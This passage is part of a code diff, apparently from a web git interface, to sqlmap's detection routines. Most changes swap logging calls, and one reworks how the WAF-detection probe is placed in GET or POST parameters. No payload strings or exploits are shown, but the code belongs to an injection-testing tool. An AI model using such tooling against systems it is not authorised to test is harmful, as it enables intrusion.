logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
kb.injection = popValue()
|
||||
|
||||
@@ -1112,7 +1122,7 @@ def heuristicCheckSqlInjection(place, parameter):
|
||||
|
||||
else:
|
||||
infoMsg += "not be injectable"
|
||||
logger.warning(infoMsg)
|
||||
logger.warn(infoMsg)
|
||||
|
||||
kb.heuristicMode = True
|
||||
kb.disableHtmlDecoding = True
|
||||
@@ -1220,7 +1230,7 @@ def checkDynamicContent(firstPage, secondPage):
|
||||
if count > conf.retries:
|
||||
warnMsg = "target URL content appears to be too dynamic. "
|
||||
warnMsg += "Switching to '--text-only' "
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
conf.textOnly = True
|
||||
return
|
||||
@@ -1278,7 +1288,7 @@ def checkStability():
|
||||
warnMsg += "injectable parameters are detected, or in case of "
|
||||
warnMsg += "junk results, refer to user's manual paragraph "
|
||||
warnMsg += "'Page comparison'"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] "
|
||||
choice = readInput(message, default='C').upper()
|
||||
@@ -1357,10 +1367,11 @@ def checkWaf():
|
||||
retVal = False
|
||||
payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)
|
||||
|
||||
place = PLACE.GET
|
||||
if PLACE.URI in conf.parameters:
|
||||
place = PLACE.POST
|
||||
value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||
else:
|
||||
place = PLACE.GET
|
||||
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
||||
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
|
||||
|
||||
@@ -1503,7 +1514,7 @@ def checkConnection(suppressOutput=False):
|
||||
warnMsg = "you provided '%s' as the string to " % conf.string
|
||||
warnMsg += "match, but such a string is not within the target "
|
||||
warnMsg += "URL raw response, sqlmap will carry on anyway"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.regexp:
|
||||
infoMsg = "testing if the provided regular expression matches within "
|
||||
@@ -1514,7 +1525,7 @@ def checkConnection(suppressOutput=False):
|
||||
warnMsg = "you provided '%s' as the regular expression " % conf.regexp
|
||||
warnMsg += "which does not have any match within the target URL raw response. sqlmap "
|
||||
warnMsg += "will carry on anyway"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
kb.errorIsNone = False
|
||||
|
||||
@@ -1529,12 +1540,12 @@ def checkConnection(suppressOutput=False):
|
||||
elif wasLastResponseDBMSError():
|
||||
warnMsg = "there is a DBMS error found in the HTTP response body "
|
||||
warnMsg += "which could interfere with the results of the tests"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
elif wasLastResponseHTTPError():
|
||||
if getLastRequestHTTPError() not in (conf.ignoreCode or []):
|
||||
warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError()
|
||||
warnMsg += "which could interfere with the results of the tests"
|
||||
logger.warning(warnMsg)
|
||||
logger.warn(warnMsg)
|
||||
else:
|
||||
kb.errorIsNone = True
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user